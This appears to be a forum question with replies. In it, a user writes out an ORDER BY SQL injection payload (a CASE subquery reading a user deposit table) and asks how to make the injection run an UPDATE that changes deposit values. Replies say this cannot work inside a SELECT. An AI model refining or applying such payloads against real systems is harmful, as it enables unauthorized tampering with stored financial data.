Found an orderBy-based sql injection vulnerability in an old system that is under maintenance, and prepare to verify it,
I will perform this sql injection first, it is ok
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
select deposit
from sysuser_user_deposit
)end)=1 ASC LIMIT 20 OFFSET 0But when I execute this sql with update statement, I get an error:
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0Error reporting
<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update<br>
sysuser_user_deposit<br>
set<br>
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0' at line 9</code>How should I let him perform update?
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
When the main body is select, it cannot be updated, otherwise it cannot be executed.
I have tried this kind of injection in mybatis. When executing update in <select>, an error is reported directly and the injection cannot be done